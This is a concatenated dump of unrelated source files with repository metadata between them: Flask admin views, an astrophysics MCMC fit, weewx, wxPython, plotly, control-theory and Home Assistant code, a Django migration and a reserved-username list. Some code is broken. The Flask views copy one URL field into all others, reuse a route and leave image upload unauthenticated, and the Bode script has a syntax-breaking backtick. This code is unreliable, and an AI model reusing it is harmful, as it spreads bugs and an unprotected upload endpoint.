db.session.add(settings)
db.session.commit()
flash('Settings successfully edited', 'success')
return redirect(url_for('admin.frontend_dashboard'))
return render_template('admin/edit_landing_setting.html', form=form)
@admin.route('/upload', methods=['GET', 'POST'])
def upload():
form = LandingImageForm()
if request.method == 'POST' and 'image' in request.files:
image = images.save(request.files['image'])
image = LandingImage(image=image)
db.session.add(image)
db.session.commit()
flash("Photo saved.")
return redirect(url_for('admin.show', id=image.id))
return render_template('admin/upload.html', form=form)
@admin.route('/image/<int:id>')
def show(id):
photo = LandingImage.query.get(id)
if photo is None:
abort(404)
url = images.url(photo.image)
return render_template('admin/show.html', url=url, photo=photo)
@admin.route('/landing-brand-settings', methods=['GET', 'POST'])
@admin.route('/landing-brand-settings/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_brand_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(OurBrand.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_brand_setting', id=1))
form = OurBrandForm()
if request.method == 'POST':
settings = OurBrand(
brand_name_one = form.brand_name_one.data,
brand_name_two = form.brand_name_two.data,
brand_name_three = form.brand_name_three.data,
brand_name_five = form.brand_name_five.data,
brand_url_one = form.brand_url_five.data,
brand_url_two = form.brand_url_five.data,
brand_url_three = form.brand_url_five.data,
brand_url_four = form.brand_url_five.data,
brand_url_five = form.brand_url_five.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_brand_setting', id=id))
return render_template('admin/new_landing_brand_setting.html', form=form)
@admin.route('/edit-landing-brand-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_brand_setting(id):
"""Edit information to the landing page."""
settings = OurBrand.query.get(id)
form = OurBrandForm(obj=settings)
if request.method == 'POST':
form.populate_obj(settings)
db.session.add(settings)
db.session.commit()
flash('Settings successfully edited', 'success')
return redirect(url_for('admin.frontend_dashboard'))
return render_template('admin/new_landing_brand_setting.html', form=form)
@admin.route('/landing-news-settings', methods=['GET', 'POST'])
@admin.route('/landing-news-settings/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_news_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(NewsLink.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_brand_setting', id=1))
form = NewsLinkForm()
if request.method == 'POST':
settings = NewsLink(
news_site_one = form.news_site_one.data,
news_site_two = form.news_site_two.data,
news_site_three = form.news_site_three.data,
news_site_five = form.news_site_five.data,
news_url_one = form.news_url_five.data,
news_url_two = form.news_url_five.data,
news_url_three = form.news_url_five.data,
news_url_four = form.news_url_five.data,
news_url_five = form.news_url_five.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_brand_setting', id=id))
return render_template('admin/new_landing_edit_setting.html', form=form)
@admin.route('/edit-landing-brand-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_news_setting(id):
"""Edit information to the landing page."""
settings = NewsLink.query.get(id)
form = NewsLinkForm(obj=settings)
if request.method == 'POST':
form.populate_obj(settings)
db.session.add(settings)
db.session.commit()
flash('Settings successfully edited', 'success')
return redirect(url_for('admin.frontend_dashboard'))
return render_template('admin/new_landing_edit_setting.html', form=form)
|
[
"[email protected]"
] | |
8a65e97c3ab254c2ee98390b1357635b7e212d35
|
d768f07ed90c0274e2d9d935eaf5ecfe734a1f56
|
/fit_mcmc_ps.py
|
2f483e28f42d7cbdab267fa0e28c4998c1cd56ba
|
[] |
no_license
|
bvillasen/simulation_analysis
|
cfd0b5de865d2fb5992d828b2824079e6798774b
|
645f0c397172ed30a713368942eec9ca68a9761a
|
refs/heads/master
| 2023-06-02T19:06:39.851760 | 2021-06-25T18:40:58 | 2021-06-25T18:40:58 | 298,894,454 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,117 |
py
|
import os, sys
import numpy as np
import pickle
import matplotlib.pyplot as plt
sys.path.append('tools')
from tools import *
#Append analysis directories to path
extend_path()
from parameters_UVB_rates import param_UVB_Rates
from simulation_grid import Simulation_Grid
from simulation_parameters import *
from mcmc_functions import *
from mcmc_data_functions import *
from data_thermal_history import *
from mcmc_plotting_functions import *
from mcmc_sampling_functions import *
# data_sets = [ 'Boss', 'Walther', 'Boera', 'Viel' ]
data_ps_sets = [ 'Boss' ]
# data_sets = [ 'Walther' ]
# data_sets = [ 'Boera' ]
# data_sets = [ 'Boss', 'Walther' ]
# data_sets = [ 'Walther', 'Boera' ]
# data_sets = [ 'Walther', 'Viel' ]
name = ''
for data_set in data_ps_sets:
name += data_set + '_'
name = name[:-1]
field = 'P(k)+'
ps_data_dir = 'lya_statistics/data/'
mcmc_dir = root_dir + 'fit_mcmc/'
create_directory( mcmc_dir )
output_dir = mcmc_dir + f'fit_results_{field}_{name}/'
create_directory( output_dir )
# load_mcmc_results = False
load_mcmc_results = True
SG = Simulation_Grid( parameters=param_UVB_Rates, sim_params=sim_params, job_params=job_params, dir=root_dir )
SG.Load_Grid_Analysis_Data()
ps_range = SG.Get_Power_Spectrum_Range( kmax=0.01 )
sim_ids = SG.sim_ids
z_min = 2.0
z_max = 5.0
ps_extras = { 'range':ps_range, 'data_dir':ps_data_dir, 'data_sets':data_ps_sets }
comparable_data = Get_Comparable_Composite( field, z_min, z_max, ps_extras=ps_extras )
comparable_grid = Get_Comparable_Composite_from_Grid( field, comparable_data, SG )
# Plot_Comparable_Data( field, comparable_data, comparable_grid, output_dir )
z_vals = [ 2.0, 2.2, 2.4, 2.6, 2.8, 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.6, 5.0, ]
data_grid, data_grid_power_spectrum = Get_Data_Grid_Composite( field, SG, z_vals=z_vals )
stats_file = output_dir + 'fit_mcmc.pkl'
samples_file = output_dir + 'samples_mcmc.pkl'
params = SG.parameters
if load_mcmc_results:
print( f'Loading File: {stats_file}')
stats = pickle.load( open( stats_file, 'rb' ) )
param_stats = {}
for p_id in params.keys():
p_name = params[p_id]['name']
p_stats = stats[p_name]
params[p_id]['mean'] = p_stats['mean']
params[p_id]['sigma'] = p_stats['standard deviation']
print( f'Loading File: {samples_file}')
param_samples = pickle.load( open( samples_file, 'rb' ) )
else:
nIter = 200000
nBurn = nIter / 5
nThin = 1
# model, params_mcmc = mcmc_model_3D( comparable_data, comparable_grid, field, 'mean', SG )
model, params_mcmc = mcmc_model_4D( comparable_data, comparable_grid, field, 'mean', SG )
MDL = pymc.MCMC( model )
MDL.sample( iter=nIter, burn=nBurn, thin=nThin )
stats = MDL.stats()
param_stats = {}
for p_id in params.keys():
p_name = params[p_id]['name']
p_stats = stats[p_name]
params[p_id]['mean'] = p_stats['mean']
params[p_id]['sigma'] = p_stats['standard deviation']
Plot_MCMC_Stats( stats, MDL, params_mcmc, stats_file, output_dir, plot_corner=False )
param_samples = Write_MCMC_Results( stats, MDL, params_mcmc, stats_file, samples_file, output_dir )
# Make Corner plot from posteriors
labels = { 'scale_He':r'$\beta_{\mathrm{He}}$', 'scale_H':r'$\beta_{\mathrm{H}}$', 'deltaZ_He':r'$\Delta z_{\mathrm{He}}$', 'deltaZ_H':r'$\Delta z_{\mathrm{H}}$' }
Plot_Corner( param_samples, labels, output_dir )
# Get the Highest_Likelihood parameter values
params_HL = Get_Highest_Likelihood_Params( param_samples, n_bins=100 )
hpi_sum = 0.95
n_samples = 1000
# Obtain distribution of the power spectrum
samples_ps = Sample_Power_Spectrum_from_Trace( param_samples, data_grid_power_spectrum, SG, hpi_sum=hpi_sum, n_samples=n_samples, params_HL=params_HL )
Plot_Power_Spectrum_Sampling( samples_ps, ps_data_dir, output_dir, scales='large', system=system )
#
# # Obtain distribution of the other fields
# field_list = ['T0']
# samples_fields = Sample_Fields_from_Trace( field_list, param_samples, data_grid, SG, hpi_sum=hpi_sum, n_samples=n_samples, params_HL=params_HL )
# Plot_T0_Sampling( samples_fields['T0'], comparable_data, output_dir, system=system )
|
[
"[email protected]"
] | |
da37392ae50890a6cbecaf0cfad0d4d00faaf40f
|
d6c66cea8c8a91681c2c913f663c2d3ea5d73f0c
|
/0. Introduction/copyspecial/copyspecial.py
|
bfe916fef6a1405d9a91d828836e8660b2a43ad1
|
[] |
no_license
|
drewlinsley/CLPS1950_assignments
|
28cc578cd981b417078a14af0fd362801a805a72
|
10f1df11d8270b0865ad03eb02e36e7b2f010159
|
refs/heads/master
| 2020-03-28T03:51:11.884643 | 2018-09-06T13:14:02 | 2018-09-06T13:14:02 | 147,675,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,278 |
py
|
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# https://developers.google.com/edu/python/exercises/copy-special
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
# +++your code here+++
# Call your functions
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
81035d4ccc746d19a13221ac8581635b6ffb7cda
|
ba66da3901361854b9bb621586f1e49ad0121ee0
|
/正式开班/第十三天/网络编程/deepin_test.py
|
9fb856a8503ceb648ae75190f86d2fa1bd0780e4
|
[] |
no_license
|
luobodage/PythonBasis
|
c4739920055afbda03774d90151ab183a83583f8
|
ea65536e759fec221a70d7647ae86120277d5459
|
refs/heads/master
| 2023-05-14T15:51:56.213282 | 2021-05-31T00:57:56 | 2021-05-31T00:57:56 | 322,145,745 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
import socket
def main():
# while True:
ip_addrs = ('192.168.56.1', 8899)
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cotent = input('请输入您要发送的内容:')
udp.sendto(cotent.encode('gbk'), ip_addrs)
udp.close()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
17f14936cb5142adcf736ab599ebe5d21785778c
|
6a95112805b64322953429270a305d01fef3faea
|
/dist/weewx-4.6.2/bin/weewx/__init__.py
|
57b8d45778a75f501f7d386c6d2692212d3bb389
|
[
"GPL-1.0-or-later",
"GPL-3.0-only",
"Apache-2.0"
] |
permissive
|
tomdotorg/docker-weewx
|
c6d59dc492a9e53f3bc898f7b9f593717092d72c
|
7085654f455d39b06acc688738fde27e1f78ad1e
|
refs/heads/main
| 2023-06-08T17:57:44.184399 | 2023-01-30T11:21:23 | 2023-01-30T11:21:23 | 54,113,384 | 21 | 16 |
Apache-2.0
| 2022-10-19T23:46:26 | 2016-03-17T11:39:29 |
Dockerfile
|
UTF-8
|
Python
| false | false | 5,375 |
py
|
#
# Copyright (c) 2009-2021 Tom Keffer <[email protected]>
#
# See the file LICENSE.txt for your full rights.
#
"""Package weewx, containing modules specific to the weewx runtime engine."""
from __future__ import absolute_import
import time
__version__="4.6.2"
# Holds the program launch time in unix epoch seconds:
# Useful for calculating 'uptime.'
launchtime_ts = time.time()
# Set to true for extra debug information:
debug = False
# Exit return codes
CMD_ERROR = 2
CONFIG_ERROR = 3
IO_ERROR = 4
DB_ERROR = 5
# Constants used to indicate a unit system:
METRIC = 0x10
METRICWX = 0x11
US = 0x01
# =============================================================================
# Define possible exceptions that could get thrown.
# =============================================================================
class WeeWxIOError(IOError):
"""Base class of exceptions thrown when encountering an input/output error
with the hardware."""
class WakeupError(WeeWxIOError):
"""Exception thrown when unable to wake up or initially connect with the
hardware."""
class CRCError(WeeWxIOError):
"""Exception thrown when unable to pass a CRC check."""
class RetriesExceeded(WeeWxIOError):
"""Exception thrown when max retries exceeded."""
class HardwareError(Exception):
"""Exception thrown when an error is detected in the hardware."""
class UnknownArchiveType(HardwareError):
"""Exception thrown after reading an unrecognized archive type."""
class UnsupportedFeature(Exception):
"""Exception thrown when attempting to access a feature that is not
supported (yet)."""
class ViolatedPrecondition(Exception):
"""Exception thrown when a function is called with violated
preconditions."""
class StopNow(Exception):
"""Exception thrown to stop the engine."""
class UnknownDatabase(Exception):
"""Exception thrown when attempting to use an unknown database."""
class UnknownDatabaseType(Exception):
"""Exception thrown when attempting to use an unknown database type."""
class UnknownBinding(Exception):
"""Exception thrown when attempting to use an unknown data binding."""
class UnitError(ValueError):
"""Exception thrown when there is a mismatch in unit systems."""
class UnknownType(ValueError):
"""Exception thrown for an unknown observation type"""
class UnknownAggregation(ValueError):
"""Exception thrown for an unknown aggregation type"""
class CannotCalculate(ValueError):
"""Exception raised when a type cannot be calculated."""
# =============================================================================
# Possible event types.
# =============================================================================
class STARTUP(object):
"""Event issued when the engine first starts up. Services have been
loaded."""
class PRE_LOOP(object):
"""Event issued just before the main packet loop is entered. Services
have been loaded."""
class NEW_LOOP_PACKET(object):
"""Event issued when a new LOOP packet is available. The event contains
attribute 'packet', which is the new LOOP packet."""
class CHECK_LOOP(object):
"""Event issued in the main loop, right after a new LOOP packet has been
processed. Generally, it is used to throw an exception, breaking the main
loop, so the console can be used for other things."""
class END_ARCHIVE_PERIOD(object):
"""Event issued at the end of an archive period."""
class NEW_ARCHIVE_RECORD(object):
"""Event issued when a new archive record is available. The event contains
attribute 'record', which is the new archive record."""
class POST_LOOP(object):
"""Event issued right after the main loop has been broken. Services hook
into this to access the console for things other than generating LOOP
packet."""
# =============================================================================
# Service groups.
# =============================================================================
# All existent service groups and the order in which they should be run:
all_service_groups = ['prep_services', 'data_services', 'process_services', 'xtype_services',
'archive_services', 'restful_services', 'report_services']
# =============================================================================
# Class Event
# =============================================================================
class Event(object):
"""Represents an event."""
def __init__(self, event_type, **argv):
self.event_type = event_type
for key in argv:
setattr(self, key, argv[key])
def __str__(self):
"""Return a string with a reasonable representation of the event."""
et = "Event type: %s | " % self.event_type
s = "; ".join("%s: %s" %(k, self.__dict__[k]) for k in self.__dict__ if k!="event_type")
return et + s
def require_weewx_version(module, required_version):
"""utility to check for version compatibility"""
from distutils.version import StrictVersion
if StrictVersion(__version__) < StrictVersion(required_version):
raise UnsupportedFeature("%s requires weewx %s or greater, found %s"
% (module, required_version, __version__))
|
[
"[email protected]"
] | |
dceefecc0bbc05158cdf9888075288b412680302
|
a7b175357e1ed29dc8332a950e320e64f5db6703
|
/venv/Lib/site-packages/wx/py/PyShell.py
|
c42152a96a555923eeaae65935079cb89adcf6cc
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
saleguas/deskOrg
|
f65b8603464dbb0e17363ca8a724c12d45da8116
|
c21d9abf56e1756fa8073ccc3547ec9a85d83e2a
|
refs/heads/master
| 2022-12-13T18:06:33.029636 | 2020-04-05T20:19:56 | 2020-04-05T20:19:56 | 164,255,371 | 3 | 1 |
MIT
| 2022-12-08T01:42:51 | 2019-01-05T22:15:27 |
Python
|
UTF-8
|
Python
| false | false | 2,201 |
py
|
#!/usr/bin/env python
"""PyShell is a python shell application."""
# The next two lines, and the other code below that makes use of
# ``__main__`` and ``original``, serve the purpose of cleaning up the
# main namespace to look as much as possible like the regular Python
# shell environment.
import __main__
original = list(__main__.__dict__.keys())
__author__ = "Patrick K. O'Brien <[email protected]>"
import wx
import os
class App(wx.App):
"""PyShell standalone application."""
def OnInit(self):
import os
import wx
from wx import py
self.SetAppName("pyshell")
confDir = wx.StandardPaths.Get().GetUserDataDir()
if not os.path.exists(confDir):
os.mkdir(confDir)
fileName = os.path.join(confDir, 'config')
self.config = wx.FileConfig(localFilename=fileName)
self.config.SetRecordDefaults(True)
self.frame = py.shell.ShellFrame(config=self.config, dataDir=confDir)
self.frame.Show()
self.SetTopWindow(self.frame)
return True
'''
The main() function needs to handle being imported, such as with the
pyshell script that wxPython installs:
#!/usr/bin/env python
from wx.py.PyShell import main
main()
'''
def main():
"""The main function for the PyShell program."""
# Cleanup the main namespace, leaving the App class.
import __main__
md = __main__.__dict__
keepers = original
keepers.append('App')
for key in list(md.keys()):
if key not in keepers:
del md[key]
# Create an application instance.
app = App(0)
# Cleanup the main namespace some more.
if 'App' in md and md['App'] is App:
del md['App']
if '__main__' in md and md['__main__'] is __main__:
del md['__main__']
# Mimic the contents of the standard Python shell's sys.path.
import sys
if sys.path[0]:
sys.path[0] = ''
# Add the application object to the sys module's namespace.
# This allows a shell user to do:
# >>> import sys
# >>> sys.app.whatever
sys.app = app
del sys
# Start the wxPython event loop.
app.MainLoop()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
406e36bcff2429592f817d0372069bb75415b0aa
|
ba7c4862dfbc9d0469f389c0cdb3fed01f99ebe3
|
/plotting/threeD_round3.py
|
3fb154b6f963dffcfabc6254d6d1fefc940621cf
|
[] |
no_license
|
cmontalvo251/Python
|
293cbdf8832d7637d5c0b31eadd02d3ccf2f2c05
|
2b12ce043ee41e08537cfb62301c6a55d4661e04
|
refs/heads/master
| 2023-06-22T21:50:21.225067 | 2023-06-14T13:42:16 | 2023-06-14T13:42:16 | 229,313,158 | 8 | 3 | null | 2021-07-31T16:01:54 | 2019-12-20T18:03:52 |
Python
|
UTF-8
|
Python
| false | false | 2,738 |
py
|
# Import data
import time
import numpy as np
import plotly.graph_objects as go
def frame_args(duration):
return {"frame": {"duration": duration},
"mode": "immediate",
"fromcurrent": True,
"transition": {"duration": duration, "easing": "linear"},
}
# Generate curve data
t = np.linspace(0, 2*np.pi, 1000)
gamma = 45*np.pi/180.0
xorbit = np.sin(gamma)*np.cos(t)
yorbit = np.sin(t)
zorbit = np.cos(gamma)*np.cos(t)
xm = np.min(xorbit) - 1.5
xM = np.max(xorbit) + 1.5
ym = np.min(yorbit) - 1.5
yM = np.max(yorbit) + 1.5
zm = np.min(zorbit) - 1.5
zM = np.max(zorbit) + 1.5
skip = int(0.01*len(t))
xanimation = xorbit[0:len(t):skip]
yanimation = yorbit[0:len(t):skip]
zanimation = zorbit[0:len(t):skip]
nb_frames = len(xanimation)
fig = go.Figure(frames=[go.Frame(data=go.Scatter3d(
x=[xanimation[k]],
y=[yanimation[k]],
z=[zanimation[k]],
mode="markers",
marker=dict(color="red", size=10),
),
name=str(k) # you need to name the frame for the animation to behave properly
)
for k in range(nb_frames)]) #Loop through all frames
# Add data to be displayed before animation starts
fig.add_trace(go.Scatter3d(
x=[xanimation[0]],
y=[yanimation[1]],
z=[zanimation[2]],
mode="markers",
marker=dict(color="red", size=10)
))
##Add Full orbit
fig.add_trace(go.Scatter3d(
x=xorbit,
y=yorbit,
z=zorbit,
mode="lines",line=dict(width=2, color="blue")
))
sliders = [{"pad": {"b": 10, "t": 60},
"len": 0.9,
"x": 0.1,
"y": 0,
"steps": [{"args": [[f.name], frame_args(0)],
"label": str(k),
"method": "animate",
}
for k, f in enumerate(fig.frames)],}]
# Layout
fig.update_layout(
title='3D Orbit',
width=600,
height=600,
scene=dict(
xaxis=dict(range=[xm,xM]),
yaxis=dict(range=[ym,yM]),
zaxis=dict(range=[zm,zM],autorange=False),
aspectratio=dict(x=1, y=1, z=1),
),
updatemenus = [{
"buttons": [{
"args": [None, frame_args(50)],
"label": "▶", # play symbol
"method": "animate",},
{"args": [[None], frame_args(0)],
"label": "◼", # pause symbol
"method": "animate",},
],
"direction": "left",
"pad": {"r": 10, "t": 70},
"type": "buttons",
"x": 0.1,
"y": 0,
}],
sliders=sliders
)
fig.show()
|
[
"[email protected]"
] | |
860b34a29b05c457ba52d4db8cddb722d4684c96
|
ba7c4862dfbc9d0469f389c0cdb3fed01f99ebe3
|
/controls/bode/lead_lag_compensation.py
|
d939d88fe4fb919bdb196d213749e47cd1052ba7
|
[] |
no_license
|
cmontalvo251/Python
|
293cbdf8832d7637d5c0b31eadd02d3ccf2f2c05
|
2b12ce043ee41e08537cfb62301c6a55d4661e04
|
refs/heads/master
| 2023-06-22T21:50:21.225067 | 2023-06-14T13:42:16 | 2023-06-14T13:42:16 | 229,313,158 | 8 | 3 | null | 2021-07-31T16:01:54 | 2019-12-20T18:03:52 |
Python
|
UTF-8
|
Python
| false | false | 314 |
py
|
import control as ctl
import numpy as np
import matplotlib.pyplot as plt
plt.close("all")
g= 9.81
L = 2.0
wn = np.sqrt(g/L)
G = ctl.tf([1],[1,0,wn**2])
print(G)
C = ctl.tf([1,1],[1,100])
print(C)
ctl.bode(C*G,dB=True)
plt.grid()
`gm,pm,wg,wp = ctl.margin(C*G)
print(gm,pm,wg,wp)
ctl.rlocus(C*G)
plt.show()
|
[
"[email protected]"
] | |
e57fbf4a5c2ba63f9063c9c5e88e364270db2ecb
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/core/2016/8/test_device_sun_light_trigger.py
|
88c0bae60ec02bf1f88b3d8c7d9fb1e9ee41e430
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null |
UTF-8
|
Python
| false | false | 3,997 |
py
|
"""The tests device sun light trigger component."""
# pylint: disable=too-many-public-methods,protected-access
import os
import unittest
import homeassistant.loader as loader
from homeassistant.const import CONF_PLATFORM, STATE_HOME, STATE_NOT_HOME
from homeassistant.components import (
device_tracker, light, sun, device_sun_light_trigger)
from homeassistant.helpers import event_decorators
from tests.common import (
get_test_config_dir, get_test_home_assistant, ensure_sun_risen,
ensure_sun_set)
KNOWN_DEV_YAML_PATH = os.path.join(get_test_config_dir(),
device_tracker.YAML_DEVICES)
def setUpModule(): # pylint: disable=invalid-name
"""Write a device tracker known devices file to be used."""
device_tracker.update_config(
KNOWN_DEV_YAML_PATH, 'device_1', device_tracker.Device(
None, None, True, 'device_1', 'DEV1',
picture='http://example.com/dev1.jpg'))
device_tracker.update_config(
KNOWN_DEV_YAML_PATH, 'device_2', device_tracker.Device(
None, None, True, 'device_2', 'DEV2',
picture='http://example.com/dev2.jpg'))
def tearDownModule(): # pylint: disable=invalid-name
"""Remove device tracker known devices file."""
os.remove(KNOWN_DEV_YAML_PATH)
class TestDeviceSunLightTrigger(unittest.TestCase):
"""Test the device sun light trigger module."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
event_decorators.HASS = self.hass
self.scanner = loader.get_component(
'device_tracker.test').get_scanner(None, None)
self.scanner.reset()
self.scanner.come_home('DEV1')
loader.get_component('light.test').init()
self.assertTrue(device_tracker.setup(self.hass, {
device_tracker.DOMAIN: {CONF_PLATFORM: 'test'}
}))
self.assertTrue(light.setup(self.hass, {
light.DOMAIN: {CONF_PLATFORM: 'test'}
}))
self.assertTrue(sun.setup(
self.hass, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}}))
def tearDown(self): # pylint: disable=invalid-name
"""Stop everything that was started."""
self.hass.stop()
event_decorators.HASS = None
def test_lights_on_when_sun_sets(self):
"""Test lights go on when there is someone home and the sun sets."""
self.assertTrue(device_sun_light_trigger.setup(
self.hass, {device_sun_light_trigger.DOMAIN: {}}))
ensure_sun_risen(self.hass)
light.turn_off(self.hass)
self.hass.pool.block_till_done()
ensure_sun_set(self.hass)
self.hass.pool.block_till_done()
self.assertTrue(light.is_on(self.hass))
def test_lights_turn_off_when_everyone_leaves(self): \
# pylint: disable=invalid-name
"""Test lights turn off when everyone leaves the house."""
light.turn_on(self.hass)
self.hass.pool.block_till_done()
self.assertTrue(device_sun_light_trigger.setup(
self.hass, {device_sun_light_trigger.DOMAIN: {}}))
self.hass.states.set(device_tracker.ENTITY_ID_ALL_DEVICES,
STATE_NOT_HOME)
self.hass.pool.block_till_done()
self.assertFalse(light.is_on(self.hass))
def test_lights_turn_on_when_coming_home_after_sun_set(self): \
# pylint: disable=invalid-name
"""Test lights turn on when coming home after sun set."""
light.turn_off(self.hass)
ensure_sun_set(self.hass)
self.hass.pool.block_till_done()
self.assertTrue(device_sun_light_trigger.setup(
self.hass, {device_sun_light_trigger.DOMAIN: {}}))
self.hass.states.set(
device_tracker.ENTITY_ID_FORMAT.format('device_2'), STATE_HOME)
self.hass.pool.block_till_done()
self.assertTrue(light.is_on(self.hass))
|
[
"[email protected]"
] | |
69982d63985cd4d63ce892aefb685f295fde5def
|
892c7bd301eeadf57b546f039faf499448112ddc
|
/organizacion/migrations/0003_auto_20160803_2128.py
|
bd7797b580ff3d4c5a0737d23d02286217f6d4cc
|
[
"MIT"
] |
permissive
|
ErickMurillo/aprocacaho
|
beed9c4b031cf26a362e44fc6a042b38ab246c27
|
eecd216103e6b06e3ece174c89d911f27b50585a
|
refs/heads/master
| 2022-11-23T15:03:32.687847 | 2019-07-01T19:16:37 | 2019-07-01T19:16:37 | 53,867,804 | 0 | 1 |
MIT
| 2022-11-22T01:02:51 | 2016-03-14T15:23:39 |
HTML
|
UTF-8
|
Python
| false | false | 1,552 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-03 21:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organizacion', '0002_auto_20160609_1700'),
]
operations = [
migrations.AlterField(
model_name='comercializacion',
name='no_socias_corriente',
field=models.FloatField(verbose_name='Mujeres (Fermentado)'),
),
migrations.AlterField(
model_name='comercializacion',
name='no_socios_corriente',
field=models.FloatField(verbose_name='Hombres (Fermentado)'),
),
migrations.AlterField(
model_name='comercializacion',
name='socias_corriente',
field=models.FloatField(verbose_name='Mujeres (Corriente)'),
),
migrations.AlterField(
model_name='comercializacion',
name='socios_corriente',
field=models.FloatField(verbose_name='Hombres (Corriente)'),
),
migrations.AlterField(
model_name='documentacion',
name='fecha',
field=models.DateField(verbose_name='Fecha de elaboraci\xf3n o actualizaci\xf3n'),
),
migrations.AlterField(
model_name='organizacion',
name='status',
field=models.IntegerField(choices=[(1, 'ONG'), (2, 'Cooperativa'), (3, 'Asociaci\xf3n'), (4, 'Proyectos')], verbose_name='Estatus Legal'),
),
]
|
[
"[email protected]"
] | |
d025d430eb3b45553a6b5e7add7305b8e93a97c6
|
467f9e8d2181c6cfba59afc4c596e328fa1ddbbc
|
/oby/settings/forbidden_usernames.py
|
f7b8c6e44e149795e97c2dea999d8fd44158bad8
|
[] |
no_license
|
jphalis/oby
|
40af213349d7d68e748d34b25c14653876874110
|
20d4b43f7918c98044f82e7bdb9c34dcc10a7994
|
refs/heads/master
| 2021-05-21T11:13:58.612908 | 2016-06-15T22:05:20 | 2016-06-15T22:05:20 | 36,603,721 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,055 |
py
|
FORBIDDEN_USERNAMES = [
# Generic reserved words
'about',
'account',
'activate',
'activity',
'add',
'admin',
'administrator',
'advertiser',
'advertisers',
'ajaxsearch',
'all',
'announcements',
'anywhere',
'api',
'app',
'apps',
'archive',
'archives',
'auth',
'authentication',
'badge',
'blog',
'business',
'businesses',
'button',
'buttons',
'cache',
'cancel',
'careers',
'cart',
'changelog',
'checkout',
'codereview',
'compare',
'config',
'configuration',
'connect',
'contact',
'contacts',
'create',
'delete',
'device',
'devices',
'direct_message',
'direct_messages',
'documentation',
'download',
'downloads',
'edit',
'email',
'employment',
'enterprise',
'faq',
'favorite',
'favorites',
'feed',
'feedback',
'feeds',
'find',
'find_users',
'fleet',
'fleets',
'follow',
'follower',
'followers',
'following',
'follows',
'friend',
'friends',
'gist',
'grappelli',
'group',
'groups',
'hashtag',
'hashtags',
'help',
'hide',
'home',
'hosting',
'hostmaster',
'idea',
'ideas',
'inbox',
'index',
'info',
'invitations',
'invite',
'is',
'it',
'job',
'jobs',
'json',
'language',
'languages',
'lists',
'login',
'logout',
'logs',
'mail',
'map',
'maps',
'me',
'media',
'mention',
'mentions',
'message',
'messages',
'mine',
'mis',
'news',
'newsletter',
'notify',
'notification',
'notifications',
'oauth',
'oauth_clients',
'offers',
'openid',
'order',
'orders',
'organizations',
'payitforward',
'pif',
'plans',
'popular',
'position',
'positions',
'post',
'postmaster',
'privacy',
'privacy_policy',
'projects',
'put',
'recruitment',
'register',
'remove',
'replies',
'reply',
'root',
'rss',
'rules',
'sales',
'save',
'search',
'security',
'sessions',
'setting',
'settings',
'shop',
'signin',
'signout',
'signup',
'sitemap',
'ssl',
'ssladmin',
'ssladministrator',
'sslwebmaster',
'statistics',
'status',
'stories',
'styleguide',
'subscribe',
'subscriptions',
'support',
'supporters',
'supportdetails',
'supporting',
'support_details',
'sysadmin',
'sysadministrator',
'terms',
'terms_of_use',
'timeline',
'tour',
'translations',
'trends',
'unfollow',
'unsubscribe',
'update',
'url',
'user',
'username',
'verified',
'verify',
'weather',
'webmaster',
'widget',
'widgets',
'wiki',
'ww',
'www',
'wwww',
'xfn',
'xml',
'xmpp',
'yaml',
'yml',
# Top 50 languages by speaking population
'chinese',
'mandarin',
'spanish',
'english',
'bengali',
'hindi',
'portuguese',
'russian',
'japanese',
'german',
'wu',
'javanese',
'korean',
'french',
'vietnamese',
'telugu',
'chinese',
'marathi',
'tamil',
'turkish',
'urdu',
'min_nan',
'jinyu',
'gujarati',
'polish',
'arabic',
'ukrainian',
'italian',
'xiang',
'malayalam',
'hakka',
'kannada',
'oriya',
'panjabi',
'sunda',
'panjabi',
